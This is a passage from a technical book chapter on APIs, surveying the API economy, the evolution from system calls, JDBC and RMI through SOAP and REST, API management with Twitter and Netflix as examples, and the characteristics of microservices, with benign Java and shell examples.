banks that empower financial institutions to securely and rapidly enhance their digital offerings using an ecosystem of third-party applications and services. As per Gartner,16 by 2016, 75% of the top 50 global banks have launched an API platform, and 25% have launched a customer-facing app store. The aim of Open Bank project is to provide a uniform interface, abstracting out all the differences in each banking API. That will help application developers to build applications on top of the Open Bank API, but still would work against any of the banks that are part of the Open Bank initiative. At the moment, only four German banks are onboarded, and it is expected to grow in the future.17 The business model behind the project is to charge an annual licensing fee from the banks which participate. Healthcare The healthcare industry is also benefiting from the APIs. By November 2015, there were more than 200 medical APIs registered in ProgrammableWeb.18 One of the interesting projects among them, the Human API19 project, provides a platform that allows users to securely share their health data with developers of health applications and systems. This data network includes activity data recorded by pedometers, blood pressure measurements captured by digital cuffs, medical records from hospitals, and more. According to a report20 by GlobalData, the mobile health market was worth $1.2 billion in 2011, but expected to jump in value to reach $11.8 billion by 2018, climbing at an impressive compound annual growth rate (CAGR) of 39%. 
The research2guidance21 15 Open Bank Project, www.openbankproject.com/ 16 Gartner: Hype Cycle for Open Banking, www.gartner.com/doc/2556416/ hype-cycle-open-banking 17 Open Bank Project connector status, https://api.openbankproject.com/connectors-status/ 18 Medical APIs, www.programmableweb.com/category/medical/apis?&category=19994 19 Human API, http://hub.humanapi.co/docs/overview 20 Healthcare Goes Mobile, http://healthcare.globaldata.com/media-center/ press-releases/medical-devices/mhealth-healthcare-goes-mobile 21 Research2guidance, http://research2guidance.com/the-market-for-mobile-health- sensors-will-grow-to-5-6-billion-by-2017/ Chapter 1 apIs rule! 11 estimated the market for mobile health sensors to grow to $5.6 billion by 2017. Aggregating all these estimated figures, it’s more than obvious that the demand for medical APIs is only to grow in the near future. Wearables Wearable industry is another sector, which exists today due to the large proliferation of APIs. The ABI Research22 estimates that the world will have 780 million wearables by 2019—everything from fitness trackers and smart watches to smart glasses and even heart monitors, in circulation. Most of the wearables come with low processing power and storages and talk to the APIs hosted in the cloud for processing and storage. For example, Microsoft Band, a wrist-worn wearable, which keeps track of your heart rate, steps taken, calories burned, and sleep quality, comes with the Microsoft Health mobile application. The wearable itself keeps tracks of the steps, distances, calories burned, and heart rate in its limited storage for a short period. Once it’s connected to the mobile application, via Bluetooth, all the data are uploaded to the cloud through the application. The Microsoft Health Cloud API23 allows you to enhance the experiences of your apps and services with real-time user data. These RESTful APIs provide comprehensive user fitness and health data in an easy-to-consume JSON format. This will enhance the ecosystem around Microsoft Band, as more and more developers can now develop useful applications around Microsoft Health API, hence will increase Microsoft Band adaptation. This will also let third-party application developers to develop a more useful application by mashing up their own data streams with the data that come from Microsoft Health API. RunKeeper, MyFitnessPal, MyRoundPro, and many more fitness applications have partnered with Microsoft Band in that effort, for mutual benefits. 22 The Wearable Future Is Hackable, https://blogs.mcafee.com/consumer/ hacking-wearable-devices/ 23 Microsoft Cloud Health API, https://developer.microsoftband.com/cloudAPI Chapter 1 apIs rule! 12 Business Models Having a proper business model is the key to the success in API economy. The IBM Redbook, The Power of the API Economy,24 identifies four API business models, as explained here: • Free model: This model focuses on the business adoption and the brand loyalty. Facebook, Twitter, and Google Maps APIs are few examples that fall under this model. • Developer pays model: With this model, the API consumer or the developer has to pay for the usage. For example, PayPal charges a transaction fee, and Amazon lets developers pay only for what they use. This model is similar to the “Direct Revenue” model described by Wendy Bohner from Intel.25 • Developer is paid directly: This is sort of a revenue sharing model. The best example is the Google AdSense. It pays 20% to developers from revenue generated from the posted ads. 
Shopping.com is another example of the revenue-sharing business model. With the Shopping.com API, developers can integrate relevant product content from the deepest product catalogue available online and add millions of unique products and merchant offers to their sites. It pays by the click.

• Indirect: With this model, enterprises build a larger ecosystem around the API, like Salesforce, Twitter, Facebook, and many more. For example, Twitter lets developers build applications on top of its APIs. This benefits Twitter by displaying sponsored tweets on end users' Twitter timelines in those applications. The same applies to Salesforce. Salesforce encourages third-party developers to extend its platform by developing applications on top of its APIs.

24 The Power of the API Economy, www.redbooks.ibm.com/redpapers/pdfs/redp5096.pdf
25 Wendy Bohner's blog on API Economy: https://blogs.intel.com/api-management/2013/09/20/the-api-economy/

The API Evolution

The concept behind APIs has its roots in the beginning of computing. An API of a component defines how others would interact with it. API stands for application programming interface, and it's a technical specification for developers and architects. If you are familiar with the Unix or Linux operating system, the man command shouldn't be something new. It generates the technical specification for each command in the system, which defines how a user can interact with it. The output of the man command can be considered the API definition of the corresponding command. It defines everything you need to know to execute it, including the synopsis, the description with all the valid input parameters, examples, and much more. The following command on a Unix/Linux or even on a Mac OS X environment will generate the technical definition of the ls command.

$ man ls
NAME
     ls -- list directory contents
SYNOPSIS
     ls [-ABCFGHLOPRSTUW@abcdefghiklmnopqrstuwx1] [file ...]

Going a little further from there, if you are a computer science graduate or have read about operating systems, you surely have heard of system calls. System calls provide an interface to the operating system's kernel; in other words, a system call is how a program requests a service from the underlying operating system. The kernel is the core of the operating system, which wraps the hardware layer from the top-level applications (see Figure 1-4). If you want to print something from the browser, the print command initiated from the browser first has to pass through the kernel to reach the actual printer, connected either to the local machine itself or remotely via the network. Where the kernel executes its operations and provides its services is known as the kernel space, while the top-level applications execute their operations and provide their services in the user space. The kernel space is accessible to applications running in the user space only through system calls. In other words, system calls are the kernel API for the user space.

The Linux kernel has two types of APIs: one for the applications running in the user space, and the other for its internal use. The API between the kernel space and the user space can also be called the public API of the kernel, while the other is its private API. Even at the top-level application, if you've worked with Java, .NET, or any other programming language, you've probably written code against an API.
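The same idea holds for the APIs you write yourself: client code is written against an interface, not against a concrete implementation. The following minimal Java sketch (all names here are made up for illustration) shows an API as an interface with two interchangeable implementations; the client only ever sees the interface.

interface GreetingApi {            // the API: the interface the client codes against
    String greet(String name);
}

class EnglishGreeting implements GreetingApi {   // one implementation of the API
    public String greet(String name) { return "Hello, " + name; }
}

class FrenchGreeting implements GreetingApi {    // another implementation; the client need not change
    public String greet(String name) { return "Bonjour, " + name; }
}

public class GreetingClient {
    public static void main(String[] args) {
        // Swap in FrenchGreeting without touching any of the client logic.
        GreetingApi api = new EnglishGreeting();
        System.out.println(api.greet("Alice"));
    }
}

The JDBC API discussed next follows exactly this pattern on a larger scale: the driver is the implementation, and the application is written only against the interface.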
Java provides Java Database Connectivity (JDBC) as an API to talk to different heterogeneous database management systems (DBMSs), as shown in Figure 1-5. The JDBC API encapsulates the logic for how your application connects to a database; thus, the application logic doesn't need to change whenever it connects to a different database. The database's connectivity logic is wrapped in a JDBC driver and exposed as an API. To change the database, you need to pick the right JDBC driver.

Figure 1-4. Operating system's kernel

Figure 1-5. JDBC API

An API itself is an interface. It's the interface for clients that interact with the system or the particular component. Clients should only know about the interface and nothing about its implementation. A given interface can have more than one implementation, and a client written against the interface can switch between implementations seamlessly and painlessly. The client application and the API implementation can run in the same process or in different processes. If they're running in the same process, then the call between the client and the API is a local one—if not, it's a remote call. In the case of the JDBC API, it's a local call. The Java client application directly invokes the JDBC API, implemented by a JDBC driver running in the same process.

The following Java code snippet shows the usage of the JDBC API. This code has no dependency on the underlying database—it only talks to the JDBC API. In an ideal scenario, the program reads the name of the Oracle driver and the connection details of the Oracle database from a configuration file, keeping the code completely clean of any database implementation.

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;

public class JDBCSample {

    public void updateEmployee() throws ClassNotFoundException, SQLException {
        Connection con = null;
        PreparedStatement prSt = null;
        try {
            Class.forName("oracle.jdbc.driver.OracleDriver");
            con = DriverManager.getConnection(
                    "jdbc:oracle:thin:@<hostname>:<port num>:<DB name>", "user", "password");
            String query = "insert into emp(name,salary) values(?,?)";
            prSt = con.prepareStatement(query);
            prSt.setString(1, "John Doe");
            prSt.setInt(2, 1000);
            prSt.executeUpdate();
        } finally {
            try {
                if (prSt != null) prSt.close();
                if (con != null) con.close();
            } catch (Exception ex) {
                // log
            }
        }
    }
}

We can also access APIs remotely. To invoke an API remotely, you need a protocol defined for interprocess communication. Java RMI, CORBA, .NET Remoting, SOAP, and REST (over HTTP) are some protocols that facilitate interprocess communication. Java RMI provides the infrastructure-level support to invoke a Java API remotely from a nonlocal Java virtual machine (a JVM which runs in a different process than the one that runs the Java API). The RMI infrastructure at the client side serializes all the requests from the client into the wire (also known as marshalling), and the RMI infrastructure at the server side deserializes them into Java objects (also known as unmarshalling); see Figure 1-6. This marshalling/unmarshalling technique is specific to Java. It must be a Java client that invokes an API exposed over Java RMI—it's language dependent.

Figure 1-6. Java RMI

The following code snippet shows how a Java client talks to a remotely running Java service over RMI. The Hello stub in the following code represents the service.
The rmic tool, which comes with the Java SDK, generates the stub against the Java service interface. We write the RMI client against the API of the RMI service.

import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIClient {

    public static void main(String[] args) {
        String host = (args.length < 1) ? null : args[0];
        try {
            Registry registry = LocateRegistry.getRegistry(host);
            Hello stub = (Hello) registry.lookup("Hello");
            String response = stub.sayHello();
            System.out.println("response: " + response);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

SOAP-based web services provide a way to build and invoke a hosted API in a language- and platform-neutral manner. It passes a message from one end to the other as an XML payload. SOAP has a structure, and there are a large number of specifications to define its structure. The SOAP specification defines the request/response protocol between the client and the server. The Web Services Description Language (WSDL) specification defines the way you describe a SOAP service. The WS-Security, WS-Trust, and WS-Federation specifications describe how to secure a SOAP-based service. WS-Policy provides a framework to build quality-of-service expressions around SOAP services. WS-SecurityPolicy defines the security requirements of a SOAP service in a standard way, built on top of the WS-Policy framework. The list goes on and on. SOAP-based services provide a highly decoupled, standardized architecture with policy-based governance. They do have all necessary ingredients to build a service-oriented architecture (SOA). At least, that was the story a decade ago.

The popularity of SOAP-based APIs has declined, mostly due to the inherent complexity of the WS-* standards. SOAP promised interoperability, but many ambiguities arose among different implementation stacks. To overcome this issue and promote interoperability between implementation stacks, the Web Services Interoperability (WS-I)26 organization came up with the Basic Profile for web services. The Basic Profile helps in removing ambiguities in web service standards. An API design built on top of SOAP should follow the guidelines the Basic Profile defines.

26 The OASIS Web Services Interoperability Organization, www.ws-i.org/

Note: SOAP was initially an acronym that stood for Simple Object Access Protocol. From SOAP 1.2 onward, it is no longer an acronym.

In contrast to SOAP, REST is a design paradigm, rather than a rule set. Even though Roy Fielding, who first described REST in his PhD thesis,27 did not couple REST to HTTP, 99% of RESTful services or APIs today are based on HTTP. For the same reason, we could easily argue, REST is based on the rule set defined in the HTTP specification. The Web 2.0 trend emerged in 2006–2007 and set a course to a simpler, less complex architectural style for building APIs. Web 2.0 is a set of economic, social, and technology trends that collectively formed the basis for the next generation of Internet computing. It was built by tens of millions of participants. The platform built around Web 2.0 was based on the simple, lightweight, yet powerful AJAX-based programming languages and REST—and it started to move away from SOAP-based services.

Modern APIs have their roots in both SOAP and REST. Salesforce launched its public API in 2000, and it still has support for both SOAP and REST.
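To make the contrast with the earlier examples concrete: unlike the in-process JDBC call or the Java-only RMI call, a RESTful API is typically consumed as JSON over HTTP, with nothing more than an HTTP client on the consumer side. The following minimal sketch uses the standard Java HTTP client against a hypothetical endpoint; the URL and the payload shape are made up purely for illustration.

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class RESTClient {

    public static void main(String[] args) throws Exception {
        // Any HTTP client can talk to a RESTful API; no language-specific stubs are needed.
        HttpClient client = HttpClient.newHttpClient();

        // Hypothetical endpoint that returns an order as a JSON payload.
        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://api.example.com/orders/101"))
                .header("Accept", "application/json")
                .GET()
                .build();

        HttpResponse<String> response =
                client.send(request, HttpResponse.BodyHandlers.ofString());

        // The status code and the JSON body are all the client needs to interpret the result.
        System.out.println("HTTP status: " + response.statusCode());
        System.out.println("Payload: " + response.body());
    }
}

Because the contract is nothing more than HTTP and JSON, the same endpoint can be consumed from JavaScript, Python, or any other language that speaks HTTP, which is one reason REST displaced SOAP for most public APIs.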
Amazon launched its web services API in 2002 with support for both REST and SOAP, but the early adoption rate of SOAP was very low. By 2003, it was revealed that 85% of Amazon API usage was on REST.28 ProgrammableWeb, a registry of web APIs, has tracked APIs since 2005. In 2005, ProgrammableWeb tracked 105 APIs, including Google, Salesforce, eBay, and Amazon. The number increased by 2008 to 1000 APIs, with growing interest from social and traditional media companies to expose data to external parties. There were 2500 APIs by the end of 2010. The online clothing and shoe shop Zappos published a REST API, and many government agencies and traditional brick-and-mortar retailers joined the party. The British multinational grocery and merchandise retailer Tesco allowed ordering via APIs. The photo-sharing application Instagram became the Twitter for pictures. The Face introduced facial recognition as a service. Twilio allowed anyone to create telephony applications in no time. The number of public APIs rose to 5000 by 2011; and in 2014 ProgrammableWeb listed out more than 14,000 APIs. In June 2019, ProgrammableWeb 27 Architectural Styles and the Design of Network-based Software Architectures, www.ics.uci.edu/~fielding/pubs/dissertation/top.htm 28 REST vs. SOAP In Amazon Web Services, https://developers.slashdot.org/ story/03/04/03/1942235/rest-vs-soap-in-amazon-web-services Chapter 1 apIs rule! 19 announced that the number of APIs it tracks eclipsed 22,000 (see Figure 1-7). At the same time, the trend toward SOAP has nearly died: 73% of the APIs on ProgrammableWeb by 2011 used REST, while SOAP was far behind with only 27%.29 Figure 1-7. The growth of APIs listed on ProgrammableWeb since 2005 The term API has existed for decades, but only recently has it been caught up in the hype and become a popular buzzword. The modern definition of an API mostly focused on a hosted, web-centric (over HTTP), public-facing service to expose useful business functionalities to the rest of the world. According to the Forbes magazine, an API is the primary customer interface for technology-driven products and services and a key channel for driving revenue and brand engagements. Salesforce, Amazon, eBay, Dropbox, Facebook, Twitter, LinkedIn, Google, Flickr, Yahoo, and most of the key players doing business online have an API platform to expose business functionalities. 29 SOAP is Not Dead, http://readwrite.com/2011/05/26/soap-is-not-dead---its-undead Chapter 1 apIs rule! 20 API Management Any HTTP endpoint, with a well-defined interface to accept requests and generate responses based on certain business logic, can be treated as a naked API. In other words, a naked API is an unmanaged API. An unmanaged API has its own deficiencies, as listed here: • There is no way to track properly the business owner of the API or track how ownership evolves over time. • API versions are not managed properly. Introduction of a new API could possibly break all the existing consumers of the old API. • No restriction on the audience. Anyone can access the API anonymously. • No restriction on the number of API calls by time. Anyone can invoke the API any number of times, which could possibly cause the server hosting the API to starve all its resources. • No tracking information at all. Naked APIs won’t be monitored and no stats will be gathered. • Inability to scale properly. Since no stats are gathered based on the API usage, it would be hard to scale APIs based on the usage patterns. • No discoverability. 
APIs are mostly consumed by applications. To build applications, application developers need to find APIs that suit their requirements. • No proper documentation. Naked APIs will have a proper interface, but no proper documentation around that. • No elegant business model. It’s hard to build a comprehensive business model around naked APIs, due to all the eight reasons listed earlier. A managed API must address all or most of the preceding concerns. Let’s take an example, the Twitter API. It can be used to tweet, get timeline updates, list followers, update the profile, and do many other things. None of these operations can be Chapter 1 apIs rule! 21 performed anonymously—you need to authenticate first. Let’s take a concrete example (you need to have cURL installed to try this, or you can use the Chrome Advanced REST client browser plug-in). The following API is supposed to list all the tweets published by the authenticated user and his followers. If you just invoke it, it returns an error code, specifying that the request isn’t authenticated: \> curl https://api.twitter.com/1.1/statuses/home_timeline.json {"errors":[{"message":"Bad Authentication data","code":215}]} All the Twitter APIs are secured for legitimate access with OAuth 1.0 (which we discuss in detail in Appendix B). Even with proper access credentials, you can’t invoke the API as you wish. Twitter enforces a rate limit on each API call: within a given time window, you can only invoke the Twitter API a fixed number of times. This precaution is required for all public-facing APIs to minimize any possible denial of service (DoS) attacks. In addition to securing and rate limiting its APIs, Twitter also closely monitors them. Twitter API Health30 shows the current status of each API. Twitter manages versions via the version number (e.g., 1.1) introduced into the URL itself. Any new version of the Twitter API will carry a new version number, hence won’t break any of the existing API consumers. Security, rate limiting (throttling), versioning, and monitoring are key aspects of a managed business API. It also must have the ability to scale up and down for high availability based on the traffic. Lifecycle management is another key differentiator between a naked API and a managed API. A managed API has a lifecycle from its creation to its retirement. A typical API lifecycle might flow through Created, Published, Deprecated, and Retired stages, as illustrated in Figure 1-8. To complete each lifecycle stage, there can be a checklist to be verified. For example, to promote an API from Created to Published, you need to make sure the API is secured properly, the documentation is ready, throttling rules are enforced, and so on. A naked business API, which only worries about business functionalities, can be turned into a managed API by building these quality-of-service aspects around it. 30 Twitter Health, https://dev.twitter.com/status Chapter 1 apIs rule! 22 The API description and discoverability are two key aspects of a managed API. For an API, the description has to be extremely useful and meaningful. At the same time, APIs need to be published somewhere to be discovered. A comprehensive API management platform needs to have at least three main components: a publisher, a store, and a gateway (see Figure 1-9). The API store is also known as the developer portal. The API publisher provides tooling support to create and publish APIs. 
When an API is created, it needs to be associated with API documentation and other related quality- of- service controls. Then it’s published into the API store and deployed into the API gateway. Application developers can discover APIs from the store. ProgrammableWeb (www.programmableweb.com) is a popular API store that has more than 22,000 APIs at the time of this writing. You could also argue that ProgrammableWeb is simply a directory, rather than a store. A store goes beyond just listing APIs (which is what ProgrammableWeb does): it lets API consumers or application developers subscribe to APIs, and it manages API subscriptions. Further, an API store supports social features like tagging, commenting, and rating APIs. The API gateway is the one which takes all the traffic in runtime and acts as the policy enforcement point. The gateway checks all the requests that pass through it against authentication, authorization, and throttling policies. The statistics needed for monitoring is also gathered at the API gateway level. There are many open source and proprietary API management products out there that provide support for comprehensive API store, publisher, and gateway components. Figure 1-8. API lifecycle Chapter 1 apIs rule! 23 In the SOAP world, there are two major standards for service discovery. Universal Description, Discovery, and Integration (UDDI) was popular, but it's extremely bulky and didn’t perform to the level it was expected to. UDDI is almost dead today. The second standard is WS-Discovery, which provides a much more lightweight approach. Most modern APIs are REST-friendly. For RESTful services or APIs, there is no widely accepted standard means of discovery at the time of this writing. Most API stores make discovery via searching and tagging. Describing a SOAP-based web service is standardized through the Web Service Definition Language (WSDL) specification. WSDL describes what operations are exposed through the web service and how to reach them. For RESTful services and APIs, there are two popular standards for description: Web Application Description Language (WADL) and Swagger. WADL is an XML-based standard to describe RESTful or HTTP-based services. Just as in WSDL, WADL describes the API and its expected request/response messages. Swagger is a specification and a complete framework implementation for describing, producing, consuming, and visualizing RESTful web services. With more than 350,000 downloads per month, of Swagger and Swagger-related Figure 1-9. API management platform Chapter 1 apIs rule! 24 tooling, the Swagger specification is promising to be the most widely used format for describing APIs.31 Figure 1-10 shows the Swagger definition of the Swagger Petstore API.32 31 Open API Initiative Specification, https://openapis.org/specification 32 Swagger Petstore API, http://petstore.swagger.io/ Figure 1-10. Swagger definition of the Swagger Petstore API Based on the Swagger 2.0 specification, the OpenAPI Initiative (OAI) has developed an OAI specification involving API consumers, developers, providers, and vendors, to define a standard, a language-agnostic interface for REST APIs. Google, IBM, PayPal, Intuit, SmartBear, Capital One, Restlet, 3scale, and Apigee got involved in creating the OpenAPI Initiative under the Linux foundation. Chapter 1 apIs rule! 25 MANAGED APIS AT NETFLIX Netflix started its journey as a DVD rental service and then evolved into a video streaming platform and published its first apI in 2008. 
In January 2010, Netflix apI recorded 600 million requests (per month), and in January 2011, the number rose up to 20.7 billion, then again after a year, in January 2012, Netflix apI was hit with 41.7 billion requests.33 today, at the time of this writing, Netflix handles more than one third of the entire Internet traffic in North america. It’s a widespread service globally over 190 countries in 5 continents, with more than 139 million members. Netflix apI is accessed by thousands of supported devices, generating billions of apI requests per day. even though Netflix apI was initially developed as a way for external application developers to access Netflix’s catalogue, it soon became a key part in exposing internal functionality to living room devices supported by Netflix. the former is the Netflix’s public apI, while the latter is its private apI. the public apI, when compared with the private apI, only attracted a small number of traffic. at the time Netflix decided to shut down the public apI in November 2011, it only attracted 0.3% of the total apI traffic.34 Netflix uses its own apI gateway, Zuul, to manage all its apI traffic.35 Zuul is the front door for all the requests from devices and web sites to the back end of the Netflix streaming application. as an edge service application, Zuul is built to enable dynamic routing, monitoring, resiliency, and security. It also has the ability to route requests to multiple amazon auto scaling Groups as appropriate.36 The Role of APIs in Microservices Going back to the good old days, there was an unambiguous definition for API vs. service. An API is the interface between two parties or two components. These two parties/components can communicate within a single process or between different processes. A service is a concrete implementation of an API using one of the technologies/standards available. The implementation of an 33 Growth of Netflix API requests, https://gigaom.com/2012/05/15/ netflix-42-billion-api-requests/ 34 Top 10 Lessons Learned from the Netflix API, www.slideshare.net/danieljacobson/ top-10-lessons-learned-from-the-netflix-api-oscon-2014 35 How we use Zuul at Netflix, https://github.com/Netflix/zuul/wiki/ How-We-Use-Zuul-At-Netflix 36 Zuul, https://github.com/Netflix/zuul/wiki Chapter 1 apIs rule! 26 API that is exposed over SOAP is a SOAP service. Similarly, the implementation of an API that is exposed as JSON over HTTP is a RESTful service. Today, the topic, API vs. service, is debatable, as there are many overlapping areas. One popular definition is that an API is external facing, whereas a service is internal facing (see Figure 1-11). An enterprise uses an API whenever it wants to expose useful business functionality to the outside world through the firewall. This, of course, raises another question: why would a company want to expose its precious business assets to the outside world through an API? Twitter once again is the best example. It has a web site that allows users to log in and tweet from there. At the same time, anything that can be done through the web site can also be done via Twitter’s API. As a result, third parties develop applications against the Twitter API; there are mobile apps, browser plug-ins, and desktop apps. This has drastically reduced traffic to the Twitter web site. Even today, the web site doesn’t have a single advertisement (but as sponsored tweets on the usual twitter stream). 
If there was no public API, Twitter could easily have built an advertising platform around the web site, just as how Facebook did. However, having a public API helped to build a strong ecosystem around Twitter. Figure 1-11. API vs. service. An API is external facing Exposing corporate data via an API adds value. It gives access to the data, not just for corporate stakeholders but also for a larger audience. Limitless innovative ideas may pop up and, in the end, add value to the data. Say we have a pizza dealer with an API that returns the number of calories for a given pizza type and the size. You can develop an application to find out how many pizzas a person would have to eat per day to reach a body mass index (BMI) in the obesity range. Even though APIs are known to be public, it’s not a strict requirement. Most of the APIs started as public APIs and became the public face of the enterprise. At the same time, private APIs (not exposed to the public) proliferated within enterprises to share Chapter 1 apIs rule! 27 functionalities within it, between different components. In that case, the differentiator between an API and a service is not just its audience. In practice, most of the service implementations are exposed as APIs. In that case, API defines the contract between the service and the outside world (not necessarily public). Microservices is the most trending buzzword at the time of this writing. Everyone talks about microservices, and everyone wants to have microservices implemented. The term “microservice” was first discussed at a software architects workshop in Venice, in May 2011. It’s being used to explain a common architectural style they’ve been witnessing for some time. Later, after a year in May 2012, the same team agreed that the “microservice” is the best-suited term to call the previously discussed architectural style. At the same time, in March 2012, James Lewis went ahead and presented some of the ideas from the initial discussion in Venice at the 33rd Degree conference in Krakow, Poland.37 Note the abstract of James lewis’ talk on “Microservices – Java, the unix Way,” which happened to be the very first public talk on Microservices, in March 2012: “Write programs that do one thing and do it well. Write programs to work together” was accepted 40 years ago, yet we have spent the last decade building monolithic applications, communicating via bloated middleware and with our fingers crossed that Moore’s law keeps helping us out. there is a better way. Microservices. In this talk, we will discover a consistent and reinforcing set of tools and practices rooted in the unix philosophy of small and simple. tiny applications, communicating via the web’s uniform interface with single responsibilities and installed as well-behaved operating system services. so, are you sick of wading through tens of thousands of lines of code to make a simple one-line change? Of all that XMl? Come along and check out what the cool kids are up to (and the cooler gray beards). 37 Microservices – Java, the Unix Way, http://2012.33degree.org/talk/show/67 Chapter 1 apIs rule! 28 One can easily argue that a microservice is service-oriented architecture (SOA) done right. Most of the concepts we discussed today, related to microservices, are borrowed from SOA. SOA talks about an architectural style based on services. 
According to the Open Group definition, a service is a logical representation of a repeatable business activity that has a specified outcome and is self-contained, may be composed of other services; the implementation acts as a black box to the service consumers.38 SOA brings the much-needed agility to business to scale and interoperate. However, over the past, SOA became a hugely overloaded term. Some people defined SOA under the context of SOAP-based web services, and others used to think SOA is all about an enterprise service bus (ESB). This led Netflix to call microservices as fine-grained SOA, at the initial stage. I don’t really care whether it’s public or private. We used to call the things we were building on the cloud “cloud-native” or “fine-grained SOA,” and then the ThoughtWorks people came up with the word “microservices.” It’s just another name for what we were doing anyways, so we just started call- ing it microservices, as well.39 —Adrian Cockcroft, former cloud architect at Netflix NINE CHARACTERISTICS OF A MICROSERVICE Martin Fowler and James lewis, introducing microservices,40 identify nine characteristics in a well-designed microservice, as briefly explained in the following: Componentization via services: In microservices, the primary way of componentizing will be via services. this is a bit different from the traditional componentizing via libraries. a library in the Java world is a jar file, and in .Net world, it’s a Dll file. a library can be defined as a component isolated to perform some specific task and plugged into the main program via in-memory function calls. In microservices world, these libraries mostly act as a proxy to a remote service running out of process. 38 Service-Oriented Architecture Defined, www.opengroup.org/soa/source-book/togaf/ soadef.htm 39 Talking microservices with the man who made Netflix’s cloud famous, https://medium. com/s-c-a-l-e/talking-microservices-with-the-man-who-made-netflix-s-cloud-famous- 1032689afed3 40 Microservices, http://martinfowler.com/articles/microservices.html Chapter 1 apIs rule! 29 Organized around business capabilities: In most of the monolithic applications we see today, the layering is based on the technology not around the business capabilities. the user interface (uI) design team works on building the user interface for the application. they are the experts on htMl, Javascript, ajax, hCI (human-computer interaction), and many more. then we have database experts who take care of database schema design and various application integration technologies, like JDBC, aDO.Net, and hibernate. then we have server-side logic team who write the actual business logic and also are the experts on Java, .Net, and many more server-side technologies. With the microservices approach, you build cross-functional, multidisciplined teams around business capabilities. Products not projects: the objectives of a project team are to work according to a project plan, meet the set deadlines, and deliver the artifacts at the end of the project. Once the project is done, the maintenance team takes care of managing the project from there onward. It is estimated that 29% of an It budget is spent on new system development, while 71% is spent on maintaining existing systems and adding capacity to those systems.41 to avoid such wastage and to improve the efficiency throughout the product lifecycle, amazon introduced the concept—you build it, you own it. the team, which builds the product, will own it forever. 
this brought in the product mentality and made the product team responsible for a given business functionality. Netflix, one of the very early promoters of microservices, treats each of their apI as a product. Smart endpoints and dumb pipes: each microservice is developed for a well-defined scope. Once again, the best example is Netflix.42 Netflix started with a single monolithic web application called netflix.war in 2008, and later in 2012, as a solution to address vertical scalability concerns, they moved into a microservices-based approach, where they have hundreds of fine-grained microservices today. the challenge here is how microservices talk to each other. since the scope of each microservice is small (or micro), to accomplish a given business requirement, microservices have to talk to each other. each microservice would be a smart endpoint, which exactly knows how to process an incoming request and generate the response. the communication channels between microservices act as dumb pipes. this is similar to the unix pipes and filters architecture. For example, the ps –ax command in unix will list out the status of currently running processes. the grep unix command will search 41 You build it, You run it, www.agilejourneyman.com/2012/05/you-build-it-you-run-it.html 42 Microservice at Netflix, www.youtube.com/watch?v=LEcdWVfbHvc Chapter 1 apIs rule! 30 any given input files, selecting lines that match one or more patterns. each command is smart enough to do their job. We can combine both the commands with a pipe. For example, ps –ax | grep 'apache' will only list out the processes that matches the search criteria ‘apache’. here the pipe (|) acts as dumb—which basically takes the output from the first command and hands it over to the other. this is one of the main characteristics of a microservice design. Decentralized governance: Most of the sOa deployments follow the concept of centralized governance. the design time governance and the runtime governance are managed and enforced centrally. the design time governance will look into the aspects such as whether the services passed all the unit tests, integration tests, and coding conventions, secured with accepted security policies and many more, before promoting from the developer phase to the Qa (quality assurance) phase. In a similar way, one can enforce more appropriate checklists to be evaluated before the services are promoted from Qa to staging and from staging to production. the runtime governance will worry about enforcing authentication policies, access control policies, and throttling policies in the runtime. With the microservices-based architecture, each service is designed with its own autonomy and highly decoupled from each other. the team behind each microservice can follow their own standards, tools, and protocols. this makes a decentralized governance model more meaningful for microservices architecture. Decentralized data management: In a monolithic application, all the components in it talk to a single database. With the microservices design, where each distinguished functional component is developed into a microservice, based on their business capabilities, will have its own database—so each such service can scale end to end without having any dependency on other microservices. this approach can easily add overhead in distributed transaction management, as data resides in multiple heterogeneous database management systems. 
Infrastructure automation: Continuous deployment and continuous delivery are two essential ingredients in infrastructure automation. Continuous deployment extends continuous delivery and results in every build that passes automated test gates being deployed into production, while with continuous delivery, the decision to deploy into the production setup is taken based on the business need.43 Netflix, one of the pioneers in apIs and microservices, follows the former approach, the continuous deployment. With the continuous deployment, the new features need not be sitting on a shelf. Once they have gone through and passed all the 43 Deploying the Netflix API, http://techblog.netflix.com/2013/08/deploying- netflix-api.html Chapter 1 apIs rule! 31 tests, they are ready to be deployed in production. this also avoids deploying a large set of new features at one go, hence doing minimal changes to the current setup and the user experience. Infrastructure automation does not have a considerable difference between monolithic applications and microservices. Once the infrastructure is ready, it can be used across all the microservices. Design for failure: the microservices-based approach is a highly distributed setup. In a distributed setup, failures are inevitable. No single component can guarantee 100% uptime. any service call may fail due to various reasons: the transport channel between the services could be down, the server instance which hosts the service may be down, or even the service itself may be down. this is an extra overhead on microservices, compared to monolithic applications. each microservice should be designed in a way to handle and tolerate these failures. In the entire microservices architecture, the failure of one service should ideally have zero or minimal impact on the rest of the running services. Netflix developed a set of tools called simian army,44 based on the success of its Chaos Monkey, to simulate failure situations under a controlled environment to make sure the system can gracefully recover. Evolutionary design: the microservices architecture inherently supports the evolutionary design. unlike in monolithic applications, with microservices the cost of upgrading or replacing an individual component is extremely low, since they’ve been designed to function independently or in a loosely coupled manner. Netflix is one of the pioneers in microservices adoption. Not just Netflix, General Electric (GE), Hewlett-Packard (HP), Equinox Inc, PayPal, Capital One Financial Corp, Goldman Sachs Group Inc, Airbnb, Medallia, Square, Xoom Corp, and many more are early adopters of microservices.45 Even though microservices became a buzzword quite recently, some of the design principles brought forward by the microservices architecture were there for some time. It’s widely believed that Google, Facebook, and Amazon were using microservices internally for several years—when you do a Google search, it calls out roughly 70 microservices before returning back the results. Just like in the case of API vs. service, the differentiator between an API and a microservice also relies on the audience. APIs are known to be public facing, while microservices are used internally. Netflix, for example, has hundreds of microservices, 44 The Netflix Simian Army, http://techblog.netflix.com/2011/07/netflix-simian-army.html 45 Innovate or Die: The Rise of Microservices, http://blogs.wsj.com/cio/2015/10/05/ innovate-or-die-the-rise-of-microservices/ Chapter 1 apIs rule! 
